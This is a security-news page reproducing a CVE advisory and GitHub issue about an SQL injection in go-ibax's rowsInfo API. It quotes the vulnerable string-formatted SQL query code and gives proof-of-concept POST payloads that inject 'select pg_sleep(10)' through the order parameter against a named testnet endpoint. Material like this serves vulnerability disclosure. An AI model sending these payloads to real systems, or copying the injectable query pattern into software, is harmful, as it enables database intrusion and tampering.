Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-3801: SQL injection vulnerability via order parameter · Issue #2062 · IBAX-io/go-ibax

A vulnerability, which was classified as critical, was found in IBAX go-ibax. This affects an unknown part of the file /api/v2/open/rowsInfo. The manipulation of the argument order leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-212637 was assigned to this vulnerability.

CVE
#sql#vulnerability#git

Describe the bug

SQL Injection vulnerability in /packages/api/database.go of go-ibax via order parameter allows attacker to spoof identity, tamper with existing data, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.This issue affects versions starting from commits on Jul 18, 2020.

file: 2 places

if where == “” {

sqlQuest = fmt.Sprintf(`select * from “%s” order by %s offset %d limit %d`, tableName, execOrder, (page-1)*limit, limit)

} else {

sqlQuest = fmt.Sprintf(`select * from “%s” where %s order by %s offset %d limit %d`, tableName, where, execOrder, (page-1)*limit, limit)

commits:
ac76098#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR172
ac76098#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR174

POC:
Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo
Request Method: POST
PostData:
① order=1%3b+select+pg_sleep(10)–&table_name=pg_user&limit=1&page=1

② with where parameter :
order=1%3b+select+pg_sleep(10)–&table_name=pg_user&where=1=1&limit=1&page=1

Reproduction

Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo
Request Method: POST
PostData: order parameter

① order=1%3b+select+pg_sleep(10)–&table_name=pg_user&limit=1&page=1

② with where parameter :
order=1%3b+select+pg_sleep(10)–&table_name=pg_user&where=1=1&limit=1&page=1

as you can see, when I use pg_sleep, the request is delayed 10s.

System Info****Logs

No response

Validations

  • Read the docs.
  • Check that there isn’t already an issue that reports the same bug to avoid creating a duplicate.
  • Check that this is a concrete bug. For Q&A open a GitHub Discussion or join our Discord Chat Server.
  • The provided reproduction is a minimal reproducible example of the bug.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907